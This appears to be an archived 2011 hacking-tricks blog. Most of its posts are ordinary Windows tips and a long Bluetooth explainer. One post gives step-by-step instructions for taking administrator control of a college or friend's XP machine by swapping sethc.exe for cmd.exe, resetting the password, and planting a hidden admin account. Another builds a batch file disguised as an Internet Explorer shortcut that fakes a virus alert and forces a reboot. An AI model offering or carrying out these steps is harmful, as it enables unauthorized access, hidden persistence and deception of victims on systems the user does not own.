Thursday 22 December 2011

Make A Autorun File For Ur Cd

If you wanna make a autorun file for that CD you are ready to burn just read this...

1) You open notepad

2) now you writ: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"

Tuesday 15 November 2011

How to trace any phone number in the World ?

Hi friends, There is most usefull and amaizing tracking tool available for Mobile No. Locator...In this article in wanna share this tool with you. This will really help you to get the location of a Mobile Number. According to the latest report from ITU (International Telecommunication Union) the worldwide mobile subscriber base stands at 4.1 billion (of which India accounts for almost 10% at 403.66 million at the end of April 2009) while fixed-line subscriber base at 1.27 billion. With dropping call rates and booming mobile telephony market we have to bear the burnt of getting lots of unwanted calls and missed calls.

Sometimes we cannot even identify which country the missed call is from (except of course the ones from our home country and a few others for which we know the international dialing code). Then how do we find it ?

Centralized database

There is a centralized database which has the following details about almost every phone number in the world.




   1. Type of Number
   2. Country
   3. City / State / Exchange location
   4. Original Network Provider


1.) Type of Number
This specifies whether the number is a Mobile number or a Landline/Fixed line referred as Geographic number. There is also a type of number called NonGeographic Number in countries like UK which is not linked to any specific location/city.

2.) Country
It is the country the number originates from.

3.) City / State / Exchange location
This gives the city and exchange location information for a fixed line phone and the zone or state for a mobile number.

4.) Original Network Provider
This is the actual telecom company providing the service like AirtelBSNLVerizonT-Mobile etc. But network provider listed here may not be the present network/service provider because Number Portability is not taken into account.

How can you use this service?
To use this service go to this page and enter the number in the international format.

+ <country code> <full phone number>

Eg.             +12532532533       or             +447010752752      

For fixed line phones, enter as follows:

+ <country code> <STD or area code> <phone number>

Eg.             +914422102210      

where 91 is India’s country code, 44 area code for Chennai and 22102210 being the actual phone number. In India area codes are of varying length but the phone number together with the area code is always 10 digits for Indian numbers.You can also use 00 instead of + .

The databases are updated quite frequently,like within 15 Days Once They Update There Database. You can also purchase a license to access the entire database for about €55 per month. The databases are available in CSV format (comma delimited strings) as well as in TXT format (tab delimited values).

How about Real Time Location Tracking?
By real time location i mean where the mobile subscriber is at that particular moment of time. We can only know the realtime location of a mobile subscriber by reading the VLR (Visitor Location Register) or HLR(Home Location Register) database maintained by the network operators’  MSC (Mobile Switching Center) for each mobile subscriber. This is not possible as of now  (at least in India) and i doubt its availabilty in future too due to security/privacy concerns.

There are many websites claiming to give access to the owner information on paying a few dollars, but i don’t know if even they can provide real time location of a mobile subscriber. If someone has used such services, please share your experiences. Let alone location, we cannot even know the name of the person on whose name the mobile number is registered.

Note 1 : Enter 5 or more digits(excluding county code) to get all the available details in many cases.

Note 2 : After doing a certain number of  queries/analysis in one session, the site does not allow you to continue your analysis, in that case just end the session and restart a new one or you can register a free account here


Visit : Numbering Plans – Phone Number Analysis | Create a Free Account 

Thankyou for Reading the artilce,Comment if you wanna share something with Us.

Change IP Address using Ultrasurf

In this tutorial I am gonna tell about another software similar to TOR and function is also same named Ultra Surf . This software is used to change your IP Address like if your current IP is showing that you are working from a city in Asia then after using ultra surf ,it will be shown that you are working from suppose Canada . In other words ,it will totally change your location and no one can find your real location using your IP . Its the best way to secure your PC and serve internet anonymously.

Ultrasurf is totally free software . It is better than any other proxy softwares because of its light weight and easy to install properties.

Installing Ultrasurf

  • First of all download Ultrasurf.Search it on google you will easily find.
  • Nowopen the software.
  • Now log on to whatismyipaddress and check your IP address
  • Now Run u.exe and a window like this will open :
  • Now, there are total three proxy servers with their speed percentages.
  • Select any one of them but better to select which is showing max speed.
  • That's all.
  • Now just log in to Whatismyipaddress and see your newly changed IP Address.

Tuesday 1 November 2011

|TUT|Export Passwords from Mozilla Firefox


Having a saved backup XML or CSV file is handy if you forgot the master password for Firefox or data stored for passwords get corrupted or infected. Its difficult to reset the Master password and hence you can use this addon for backing up your Firefox Passwords and Importing/ Exporting it.

All you need to do is,install this Addon
https://addons.mozilla.org/en-us/firefox/addon/password-exporter/

-
Then

Tools -> Add-ons -> Extensions tab -> click Preferences button next to the extension

Anytime you can Export/import your passwords at one click :)

-


-
Hope it will help some people .

Friday 14 October 2011

Account has been deleted ~~ prank trick !!!!!

This trick will make the victim think they have got a virus when they click on an icon such as Internet Explorer . You can use any website name as per ur wish i.e. rediff , yahoo , facebook etc. etc. I will be using Facebook.


1) Open notepad

2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

Note : The digit "300" which you see in above syntax is time. you can decrease or increase time as per ur wish . If u want to set 2 minute shutdown time , then write "120" instead of "300" i.e. converting minutes into seconds.






3) Save as Internet Explorer.bat






4) Right click on Internet Explorer .bat and click Create Shortcut


[


5) Right click on shorcut and click Properties.




6) Click Change Icon





7) Choose Internet Explorer icon or similar , click OK , then click Apply





8) Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:







After five minutes windows will restart , that is all. enjoy n laugh

Make USB storage devices totally useless without your permission.



I am going to show you how you can make USB storage devices totally useless without your permission.


To block all the storage device in your Windows, run registry editor by typing regedit in RUN command.
In the registry editor, at left side navigation pane, navigate to following location:


HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Services > USBSTOR

Now at the right side double click on START.




To block USB storage Medias, change the value data to 4.



If you want to unblock USB storage Medias just navigate to the same location and change th value data to 3.




that's all....make ur PC safe....more tricks to come....rep n reply if u like


MORE NEW N UNIQUE TRICKS TO COME...

Tuesday 4 October 2011

Partition Hard Drive Without Losing Data

Before starting note that,

- We can partition any drive, even a system drive

- We can do it only in Windows, Windows 7 and Vista specifically

So let’s divide it.

Go to Start > Right click on My Computer and choose Manage.
Disk Management Window will
Pop-up, it may take time to load it since it fetches for all the
hardware and system information in your PC. After it’s fully loaded, go
to Storage> Disk management at the left sidebar. This is where we’ll
have all the information about storage devices that are in our PC
currently connected and active.

At the right column all the storage media will be listed with their
basic information like File system type, and status. Now choose the Volume that you want to partition. Right Click on it and select Shrink Volume option from menu.

As soon as you click on the Shrink Volume option, system will search for available space in your selected Disk Volume.
This will not take much longer than few seconds. After querying, Shrink window will pop-up. This is where you’ll have to specify the Volume for next partition.

Look at the total size of available shrink space. Below it, you’ll have to Enter the space to shrink.you must make sure that the size is not below the total size of space taken by files in that drive.

You can check the used space by right clicking on the drive you are going to partition and choose Properties.
Click on Shrink button after specifying the size to shrink. The shrink
size is for the value for the partition where your old files will be
contained and remaining size will allocated for your next partition.

But you’ll still not able to access this new drive. You’ll have to
format it and specify the drive letter to access them. To do so,
continue reading.

Right click on unallocated drive and choose New Simple Volume option.

New Simple Volume Wizard Window will popup.

Click on Next button to continue.

In next window, you’ll have to specify the size for your new volume.
Set full size if you are satisfied with two partitions; else divide it
again for new partition.

Next choose any drive letter from the available list and click on Next button.

In next window, leave everything as default but make sure it’s similar to the screen below:

Click on Finish window to complete the wizard.

If you’ve autoplay enabled in your computer, then New Volume will be auto played for the first and last time.
With similar method you can also format your empty drive to create multiple partitions.

Hack administrator from Guest account in XP

If u wanted to hack your college pc with guest account/student account so that you can download with full speed there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…

Concept
======

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Here is how to do that -

Go to C:/windows/system32
Copy cmd.exe and paste it on desktop
rename cmd.exe to sethc.exe
Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

Now Log out from your guest account and at the user select window,press shift key 5 times.
Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.


Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
Congrats You have hacked admin from guest account.
Further..

Also, you can further create a new user at the command prompt by typing “NET USER SUSHIL490023 /ADD” where “
SUSHIL490023” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)

Make Folders Invisible


Hiding folders is an easy to do task inMicrosoft Windows XP. This is a great way to keep all your personal files un-findable.
To do this, create a new folder some where. Then ‘Right Click’ and select
Rename
Now press and hold down the ‘Alt’ key and type in
0160
This will get rid of the text. Now ‘Right Click’ on the folder, and ‘click’ on
Properties
Now ‘click’ on the ‘Customize’ tab. Then click on
Change Icon


Scroll to the right until you find a few white icons. ‘Click’ on one of them, and then click on ‘Apply’ and then ‘Ok.’
You have just made a folder invisible and can hide all your personal files in it. Don’t you just love Windows XP?

Convert 1Gb Pendrive To 2G

Hello guys hope you all are enjoying good health. As the topic name shows its a trick to convert 1 GB pendrive to 2 GB Pen just show that it is converted to 2gb ...but it is actually 1gb only.While I was searching online ,I found this trick where people want to try whether this crack is really working or not. But they are not aware of it so they don’t want to take risk. And they didn’t even mention what the application is and from where it can be downloaded and etc. So i spent half day for searching the application here and there and finally got the crack in a small forum. So i was in a confusion that will this work or not. I just cant trust it and go blindly so i scanned it in all circumstances and started to convert the card. I was shocked when i completed the process of the application. I was amazed seeing my 1 GB memory card to 2 GB and all the data can be copied according to 2GB size. So just want to give this application to all our friends. But after some time I realized that it just showing 2GB but in actual its just the same 1 GB drive. But its working really great .

Steps to follow

  • First of all we have to make sure that its a 1 GB ( 970+ Mb ) memory card. This only works on 1GB (970+ Mb) And it supports only in some of the rare cases of memory cards.
  • Now Backup all your data in that because we have to format the drive.
  • After backing up now open the Skimedi Fix 2GB Capacity application.
  • A small window will pop up showing the FIX and Cancel option. And you have to browse the drive where it is located (generally G: or L: drive for USB sticks)
  • After selecting the drive press on FIX and then the updating process will be followed up. It will ask your conformation whether you agree to format or not. click on yes.
  • Later it will ask to replug the device. Just replug the memory stick card and put it back.
  • The size of the memory will be increased from 1Gb to 2Gb, you can see the properties before and after the cracking process.
Note : I am again telling that this trick will just show that it is converted to 2GB but in actual its still the same 1 GB drive and if you want to get the original size just format it and you will be left again with 1 GB drive.
Hope you guys like it .... :>

Saturday 1 October 2011

How Bluetooth works?

The number of ways to wirelessly connect an increasing number of formerly wired devices is becoming confusing. Wi-Fi, 802.11a, 802.11b, 802.11g, GPRS, IrDA and Bluetooth are just some of the terms now being used to describe different types of wireless connectivity.
This article explains the differences between the main types of wireless connectivity, and explains how Bluetooth can be useful for you.

Different Types of Connectivity Compared

To start off the discussion, here is a table to show the major differences between the main types of wireless connectivity and traditional networking.
Type Speed Range Comments
IrDA 9.6kb - 115kb (- 4Mb) < 6ft Infra-red. The two devices must have their IR ports facing each other. For simple data exchange. Uses very little power.
Wi-Fi 1Mb - 54Mb see below Wi-Fi refers to any of the three 802.11 types of wireless service below, and to future new subcategories yet to be released. Acts like a regular wired network in most respects. Either built in or available as add-on cards or adapters for desktop computers.
802.11a 1 - 54Mb 50ft - 150ft Not commonly used, uses different frequency than 802.11b/g.
802.11b 1 - 11Mb 100ft - 300ft Most common version at present.
802.11g 1 - 54Mb 120ft - 350ft The latest version, backwardly compatible with 802.11b.
Bluetooth 120kb - 723kb 30ft - 300ft Class 3 devices (eg in most personal computing type devices) have a short 30ft range, high powered Class 1 devices have the longer range. Either built in or available as add-on cards.
GPRS < 115kb wherever suitable cellphone coverage Data service used by GSM cellphones and by some add-on cards for laptops and pda's. Speed typically about 30kb depending on how many users are sharing the service on each cell at any given time. A 2.5G service.
2.5G variously up to about 128kb wherever suitable cellphone coverage Various compromise new types of 'always on' data service for cell phones that are better than nothing but not nearly as good as the 3G service that all cell phone companies are hoping to introduce when funding and technology allows.
3G 2Mb stationary, 384kb moving with good signal, 144kb moving fast/poor signal wherever suitable cellphone coverage A largely futuristic technology not much deployed (yet) in the US which promises amazingly fast data transfer. Sprint PCS Vision and AT&T EDGE (100-130kb) are the closest things to 3G in the US at present.
Modem < 56kb not wireless The 'old fashioned' way to dial up from a computer to the internet.
DSL/Cable 100kb - 1.5Mb not wireless Not wireless.'Broadband' connections to the internet.
LAN 10Mb - 100Mb not wireless Not wireless. Common type of cabled network in most offices.

So What is Bluetooth?

Bluetooth is a very simple type of wireless networking that can allow up to eight devices to be connected together in a mini-network.
It is very short range in operation, and so is considered to be for 'personal' networking. With a range typically under 30ft, this allows enough distance to perhaps communicate across your office, but not any further. This short range is also its major security feature - anyone wishing to eavesdrop on your Bluetooth communications would not only need special equipment but would also need to be quite close to you.
It is a moderately slow type of networking, but it can transfer data sufficiently fast enough for most typical applications.
Bluetooth is hoped to be a very low cost type of networking, and, as it becomes more widespread, the cost of adding Bluetooth to devices should drop down to perhaps no more than an extra $5-10 on the selling price.
Bluetooth is designed to be compatible across a range of very different operating systems and devices, including things that you would not normally think of as being 'computer' type items - for example, some types of headset. Bluetooth networking can enable the headset to connect with other devices such as your phone, your MP3 player, your computer, or your PDA.
A Bluetooth enabled headset would mean that you can leave your cellphone in your pocket or briefcase, but still receive incoming phone calls. If your cellphone supports voice recognition for dialing out, you can even place calls as well as receive them, while never needing to reach for your phone. The safety benefits of this, if you're driving, are obvious.
It is probably better from a health point of view to have a very low powered headset close to your head than it is to have a phone that might be generating 100 or even 300 times as much radio energy close to your head.
Bluetooth can also help different devices to communicate with each other. For example, you might have a phone, a PDA, and a computer. If all three devices have Bluetooth capabilities, then (with the appropriate software on each device) you can probably share contact information between all three devices quickly and conveniently. And you can look up a phone number on your PDA (or laptop) and then place a call direct from the laptop or PDA, without needing to touch your cellphone.
Bluetooth is not a magical solution giving universal connectivity between devices. Each device also needs to have the appropriate software as well as the basic Bluetooth communication capability, and so sometimes the promise and theory of what could be possible is not fully matched by the reality.
For best compatibility, devices should support the Bluetooth 1.1 standard. A new standard - 1.2, was formalized in early November 2003 and this will quickly become the dominant standard.
Bluetooth has been slow to become accepted in the market, but now is starting to become increasingly prevalent. Prices are falling and increasing numbers of devices are offering Bluetooth connectivity. Over one million Bluetooth devices are now being sold every week (although mainly outside the US).

Bluetooth Range

Most Bluetooth devices are described as 'Class 2'. These are very low power (typically 1 milliwatt - 1/1000th of a watt) and have a range of about 10 m (33 ft).
Some devices - for example, some plug in 'dongles' that can be added to to laptop computers - are Class 1. These have range comparable to that of Wi-Fi, ie, 100 m or 330 ft.
With Bluetooth, short range is actually a benefit, because it reduces the chance of interference between your Bluetooth devices and those belonging to other people nearby.

Devices that Use Bluetooth

A limited, but growing number of devices use Bluetooth at present. Devices that are starting to have Bluetooth connectivity built in include:
  • Digital cameras and camcorders
  • Printers
  • Scanners
  • Cell Phones
  • PDAs
  • Laptops
  • Keyboards and Mice
  • Headsets
  • In-car handsfree kits
  • GPS navigation receivers
  • Home appliances (microwaves, washers, driers, refrigerators)
In addition, add on Bluetooth adapters are available for computers (eg with a USB interface) and for PDAs (eg SD cards).

Bluetooth connections

Bluetooth is a high-speed, low-power microwave wireless link technology, designed to connect phones, laptops, PDAs and other portable equipment together with little or no work by the user. Unlike infra-red, Bluetooth does not require line-of-sight positioning of connected units. The technology uses modifications of existing wireless LAN techniques but is most notable for its small size and low cost. The current prototype circuits are contained on a circuit board 0.9cm square, with a much smaller single chip version in development. The cost of the device is expected to fall very fast, from $20 initially to $5 in a year or two. It is envisioned that Bluetooth will be included within equipment rather than being an optional extra. When one Bluetooth product comes within range of another, (this can be set to between 10cm and 100m) they automatically exchange address and capability details. They can then establish a 1 megabit/s link (up to 2 Mbps in the second generation of the technology) with security and error correction, to use as required. The protocols will handle both voice and data, with a very flexible network topography.
This technology achieves its goal by embedding tiny, inexpensive, short-range transceivers into the electronic devices that are available today. The radio operates on the globally-available unlicensed radio band, 2.45 GHz (meaning there will be no hindrance for international travelers using Bluetooth-enabled equipment.), and supports data speeds of up to 721 Kbps, as well as three voice channels. The bluetooth modules can be either built into electronic devices or used as an adaptor. For instance in a PC they can be built in as a PC card or externally attached via the USB port.
Each device has a unique 48-bit address from the IEEE 802 standard. Connections can be point-to-point or multipoint. The maximum range is 10 meters but can be extended to 100 meters by increasing the power. Bluetooth devices are protected from radio interference by changing their frequencies arbitrarily upto a maximum of 1600 times a second, a technique known as frequency hopping. They also use three different but complimentary error correction schemes. Built-in encryption and verification is provided.
Moreover, Bluetooth devices won't drain precious battery life. The Bluetooth specification targets power consumption of the device from a "hold" mode consuming 30 micro amps to the active transmitting range of 8-30 milliamps (or less than 1/10th of a watt). The radio chip consumers only 0.3mA in standby mode, which is less than 3 % of the power used by a standard mobile phone. The chips also have excellent power-saving features, as they will automatically shift to a low-power mode as soon as traffic volume lessens or stops.
But beyond untethering devices by replacing the cables, Bluetooth radio technology provides a universal bridge to existing data networks, a peripheral interface, and a mechanism to form small private ad hoc groupings of connected devices away from fixed network infrastructures. Designed to operate in a noisy radio frequency environment, the Bluetooth radio uses a fast acknowledgment and frequency hopping scheme to make the link robust. Bluetooth radio modules avoid interference from other signals by hopping to a new frequency after transmitting or receiving a packet. Compared with other systems operating in the same frequency band, the Bluetooth radio typically hops faster and uses shorter packets. This makes the Bluetooth radio more robust than other systems. Short packages and fast hopping also limit the impact of domestic and professional microwave ovens. Use of Forward Error Correction (FEC) limits the impact of random noise on long-distance links. The encoding is optimized for an uncoordinated environment.
Bluetooth guarantees security at the bit level. Authentication is controlled by the user by using a 128 bit key. Radio signals can be coded with 8 bits or anything upto 128 bits. The Bluetooth radio transmissions will conform to the safety standards required by the countries where the technology will be used with respect to the affects of radio transmissions on the human body. Emissions from Bluetooth enabled devices will be no greater than emissions from industry-standard cordless phones. The Bluetooth module will not interfere or cause harm to public or private telecommunications network.
The Bluetooth baseband protocol is a combination of circuit and packet switching. Slots can be reserved for synchronous packets. Each packet is transmitted in a different hop frequency. A packet nominally covers a single slot, but can be extended to cover up to five slots. Bluetooth can support an asynchronous data channel, up to three simultaneous synchronous voice channels, or a channel, which simultaneously supports asynchronous data and synchronous voice. It is thus possible to transfer the date asynchronously whilst at the same time talking synchronously at the same time. Each voice channel supports 64 kb/s synchronous (voice) link. The asynchronous channel can support an asymmetric link of maximally 721 kb/s in either direction while permitting 57.6 kb/s in the return direction, or a 432.6 kb/s symmetric link.

Bluetooth Operation Modes

An interesting aspect of the technology is the instant formation of networks once the bluetooth devices come in range to each other. A piconet is a collection of devices connected via Bluetooth technology in an ad hoc fashion. A Piconet can be a simple connection between two devices or more than two devices. Multiple independent and non-synchronized piconets can form a scatternet. Any of the devices in a piconet can also be a member of another by means of time multiplexing. i.e a device can be a part of more than one piconet by suitably sharing the time. The Bluetooth system supports both point-to-point and point-to-multi-point connections. When a device is connected to another device it is a point to point connection. If it is connected to more that one (upto 7 ) it is a point to multipoint connection. Several piconets can be established and linked together ad hoc, where each piconet is identified by a different frequency hopping sequence. All users participating on the same piconet are synchronized to this hopping sequence. If a device is connected to more than one piconet it communicates in each piconet using a different hopping sequence. A piconet starts with two connected devices, such as a portable PC and cellular phone, and may grow to eight connected devices. All Bluetooth devices are peer units and have identical implementations. However, when establishing a piconet, one unit will act as a master and the other(s) as slave(s) for the duration of the piconet connection. In a piconet there is a master unit whose clock and hopping sequence are used to synchronize all other devices in the piconet. All the other devices in a piconet that are not the master are slave units. A 3-bit MAC address is used to distinguish between units participating in the piconet. Devices synchronized to a piconet can enter power-saving modes called Sniff and hold mode, in which device activity is lowered. Also there can be parked units which are synchronized but do not have a MAC addresses. These parked units have a 8 bit address, therefore there can be a maximum of 256 parked devices.
Voice channels use either a 64 kbps log PCM or the Continuous Variable Slope Delta Modulation (CVSD) voice coding scheme, and never retransmit voice packets. The voice quality on the line interface should be better than or equal to the 64 kbps log PCM. The CVSD method was chosen for its robustness in handling dropped and damaged voice samples. Rising interference levels are experienced as increased background noise: even at bit error rates up 4%, the CVSD coded voice is quite audible.

Bluetooth and the Internet

Bluetooth can be used to connect between a device that has internet connectivity and another device that does not, for example, you might use Bluetooth to connect from your PDA to your laptop, and then your laptop might use Wi-Fi to connect to a Wi-Fi router and from there you would be connected to the internet.
Sometimes when buying a PDA you may find yourself with an apparent 'either//or' choice - either buy a device with Bluetooth; or a device with Wi-Fi capability. In such a case, it would seem at first glance that if you want to connect to the internet - especially while traveling out of your office, Wi-Fi would be a better choice.
However, this is not quite such a clear choice. Wi-Fi 'hotspots' are few and far between. A much better approach might be to get Bluetooth on your PDA and also on your cellphone and use Bluetooth to connect to your cellphone and then connect through your cellphone and out to the internet from there. I use T-Mobile's GPRS service - they offer unlimited connect time and unlimited bandwidth usage for only $20/month extra on top of my regular cellphone service (and GPRS connection time does not count against my monthly minutes - it truly is unlimited for only $20/month).
In my opinion, this is the perfect solution. GPRS coverage is much more widespread than Wi-Fi coverage, and while it is not fast, it is adequate for simple mail sending/receiving, instant messaging, and occasional web browsing such as you're likely to do on a PDA. Although I also have Wi-Fi in my laptop, these days I never use it, and indeed if I'm sitting in a Starbucks with my laptop, I'll be connecting to the internet not through the Wi-Fi in Starbucks, but via Bluetooth and my cellphone's GPRS!

Which is better - Bluetooth or Wi-Fi

Wi-Fi is primarily used as an alternate to traditional cable based networks. It has a longer range than Bluetooth, and supports faster data transfer speeds, and so it might seem better than Bluetooth.
But, in reality, Bluetooth and Wi-Fi have different purposes. Bluetooth is intended for limited data transfer between many different types of devices, Wi-Fi is more focussed on faster data transfer between computers on a network.
One of the distinctive elements of Bluetooth is that is uses very much less power than Wi-Fi. Class 2 devices (such as are in PDAs, phones, headsets, etc) transmit a very low power signal (1 mW) and only transmit intermittently when in standby mode, saving even more power. Wi-Fi, on the other hand, consumes a great deal of power, and so for any type of portable battery operated device, Bluetooth will allow for substantially more battery life than would Wi-Fi.
If you're simply wanting to swap data between different devices in your office and elsewhere on a casual and occasional basis, then - assuming that the software and Bluetooth hardware is available - Bluetooth is probably a better choice for you. If you need more range, and higher bandwidth; perhaps if you want to connect computers into your office LAN, then Wi-Fi is a better choice for you.

Bluejacking

Bluejacking is a moderately harmless 'fun' type trick that some people have discovered. It involves sending messages from your Bluetooth device to other people close to you with Bluetooth devices, and surprising the recipient in the process.
The easiest way to Bluejack is to create a new phonebook contact, with the message you want to send in the name field. Then, in a busy place with lots of people (so that there is a chance that someone might have a Bluetooth enabled phone or PDA), choose the option to send your new contact via Bluetooth. Your phone or PDA will then search for all Bluetooth devices in range, and present you with a list. Choose whichever device you wish from the list and send it. The recipient will get a message asking if they wish to accept your contact, and showing the text you entered as the contact's name (eg something like 'Bad weather today isn't it' or whatever else you wish to say).
If you're planning to enjoy Bluejacking (or Toothing, below) you'll probably want to get your eye in to guessing how far away 10 m/33 ft is so as to know how many people and devices might be within range.

Toothing

Harmless Bluejacking didn't take long to evolve into a more goal oriented social activity, now known as 'toothing', whereby people communicate to other Bluetooth equipped people around them, trying to arrange casual and immediate trysts.

Summary

Bluetooth promises to be a low cost, convenient, and simple way of enabling your various computer devices to talk to each other and to their peripherals. The reality has yet to match the promise, but Bluetooth is becoming more widespread and functional every day. Bluetooth is almost certainly in your future.
Bluetooth is not a competitor to Wi-Fi. It offers different functionality for different purposes.

Tuesday 13 September 2011

How To Increase The Virtual Memory Of Your PC?




How to Increase Virtual Memory?

You can easily increase virtual memory by following the steps below. Your virtual memory is important but before you alter your settings it’s best to find out more about virtual memory.

What is Virtual Memory?

Virtual memory is simulated RAM. When you have used up all your RAM, your computer will shift data to an empty space on the hard drive. The computer swaps data to the hard disk and back to your RAM as needed. When you increase your virtual memory you are increasing the empty space that is reserved for your RAM overflow.

Also having enough available space is absolutely necessary for your virtual memory and RAM to function properly. You can increase Virtual Memory performance automatically by freeing up resources in your registry. Or You may want to use a Registry Cleaner.


 How to increase Virtual Memory?

In Windows XP

1.Click Start, and then click Control Panel.
2.Click Performance and Maintenance, and then click System.
3.On the Advanced tab, under Performance, click Settings.
4.On the Advanced tab, under Virtual memory, click Change.
5.Under Drive [Volume Label], click the drive that contains the paging file that you want to change.
6.Under Paging file size for selected drive, click to Custom size check box. You can enter the amount of memory you would like to reserve for Virtual memory by entering the initial and maximum size.
7.Click Set
When you are prompted to restart the computer, click Yes.
Special Note: You should choose the same amount for the initial size and maximum size. This will Stop your CPU from constantly changing the paging file.

HOT TIP: To stop your CPU from constantly changing the paging file, set the initial and maximum size to the same value. For example, 500 and 500. The value should be at least 1.5 times more than your physical RAM. If your computer has 512MB of RAM increase the virtual memory paging file to 1.5*512= 768

In Vista
1. Click Start button Picture of the Start button
2. Click Control Panel
3. Choose System and Maintenance and then click System.
4. In the left pane, click Advanced system settings.
5.On the Advanced tab, under Performance, click Settings.
6. Click the Advanced tab, and then, under Virtual memory, choose Change.
7. Click Custom to change the Initial size (MB) and Maximum size. See the hot tip above.

Remember to choose the drive you would like to use to increase the virtual memory. In most cases it usually your C: Drive. You can set the initial size and maximum size after clicking the Custom size check box.Remember its better to keep the Virtual memory values the same.

Also having enough available space is absolutely necessary for your virtual memory and RAM to function properly

Learn How to Create your own SMS channel on Google to update your latest posts through SMS !

Step 1: Open this link on your browser http://labs.google.co.in/smschannels/browse

Step 2: Before subscribing to or creating an SMS Channel, you need to select a nickname and verify your mobile number.
Step 3: Give you nick name and mobile number and click on "send verification code". You will receive an SMS with verification code. Enter verification code and click on finish setup.

Step 4: To subscribe available channels, click on subscribe button.
Step 5: To Create your own channel and to alert your friends in real time through SMS CLICK HERE. You can create your own channel(s) to receive regular alerts over SMS on specific topics that interest you. You can also invite others to subscribe to your channel(s). You can use your channel(s) as a discussion group as well, allowing other people to post messages.

Step 6: After filling all the information, click on create channel

.XXX Domain Open For Registration, But Not To All Comers !

If you’re the owner of a Furry fetish page and sick of receiving concerned emails sent by dog-loving (just not that kind of loving) grannies who inadvertently stumble across your site, today’s your day: the .xxx domain is officially kinda open for registration.  Porn and adult sites who aren’t ashamed of having those scarlet letters branded into their webpage URL can now call dibs with ICM Registry, the owner of the .xxx domain.  It’s the first step in the Web’s cautious move to create a virtual red light district.


ICM’s kicking off the fun by extolling webmasters to "Get Yours Today" and splashing a ridiculously hilarious slogan across the top of their website: “.XXX Isn’t Just Coming, It’s Here!” The company’s working with other registrars to handle the influx of applicants. This is the first wave of .xxx applications, dubbed “Sunrise A,” and it’s limited to adult websites. In “Sunrise B,” the next stage, established websites and companies can swoop in and claim the .xxx version of their website to prevent, say, nickjr.xxx from falling into the wrong hands and scarring young minds forever. After that, the floodgates open.
ICM says the .xxx domain won’t only immediately identify a URL as NSFW, it holds a host of other benefits as well, not the least of which is that every site sporting the .xxx extension will be scanned for viruses on a daily basis by McAfee.
“With all the sites malware scanned daily and properly labelled, it’s a win for consumers of adult content who are now able to identify and select the sites they wish to visit more easily and safely,” ICM CEO Stuart Lawley explained in the company’s press release. “It is also a win for the adult entertainment industry as .XXX helps to ensure that responsible adult content is easily identified online, leading to greater and more predictable revenues. And finally it’s a win for those who want to avoid adult content online, with internet users in no doubt about the underlying content of the sites and having the tools to help avoid them.”

Sunday 4 September 2011

10 Simple Computer Tricks For You



1.TRICK TO CREATE FOLDERS WITHOUT NAME
=>Click on a FOLDER
=>Right click and goto rename option
=>Delete the old name
=>Pressing ALT key type 0160
=>Now press enter
=>You have created a folder without name
 
2.TRICK TO ADD YOUR NAME IN TASK BAR
 
GOTO
=>Start
=>Control Panel
=>Regional & Language Options
      Customize
=>Time
=>AM Symbol
=>Enter your name 
      Thats it,your name is added to your Task Bar
 
3.TRICK TO CREATE A AUTORUN CD
 
=>Open notepad and type           
[autorun]           
OPEN=setup.exe           
ICON=iconname.ico 
=>save as autorun.inf on the desktop
Write ur CD with the autorun file, ur desired icon for the CD &  the setup file.
iconname.ico is the name of the icon file which is desired for ur CD. =>Setup.exe is the name of the setup which u want to make it autorun.
 
4.TRICK TO CHANGE THE INTERNET EXPLORER TITLE
 
Follow these simple steps
 1)=>Go to Start 
2)=>Type Regedit
3)Go to 
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
4)Enter what you want appear in the title bar 
eg:YOUR NAME
That’s it YOUR NAME will be displayed.
 
5.TRICK TO CLEAN RAM WITHOUT SOFTWARE
 
=>To clean ur RAM without software 
=>Open notepad & type FREEMEM=SPACE(64000000)
=>Save it as ram.vbs and close it
=>Now run the script by double click on ti
=>now your pc work fast
 
6.TRICK TO DISABLE AUTOPLAY OF PENDRIVE
 
Disable autoplay of pendrive to avoid virus activation:
go to run 
=>Run
=>Type  gpedit.msc
=>Computer configuration
=>Administrative Templates
=>System 
      (In the Right side) 
=>Go to Turn off Autoplay
=>Enable
=>All drives
 
7.TRICK TO FIX CORRUPTED FILES IN WINDOWS XP
 
=>Load XP cd into cd drive
=>Go to Run
=>Type sfc/scannowok
=>THEN copy and paste the lost file from cd
 
8.TRICK TO CONVERT TEXT INTO VOICE
 
A hidden trick to convert ur text to voice without any software.

=>Try out this go to  Run type

=>control speech

=>write any text & speech it
 
9.TRICK TO OPERATE PC WITHOUT MOUSE
 
=>Here is a simple trick to operate COMPUTER without MOUSE
PRESS the left
               SHIFT+ALT+NumLock+ok
          
Now you can use your number keys to act as mouse
Note:It will not disable your mouse
To return back to previous state again press these combination keys together.
 
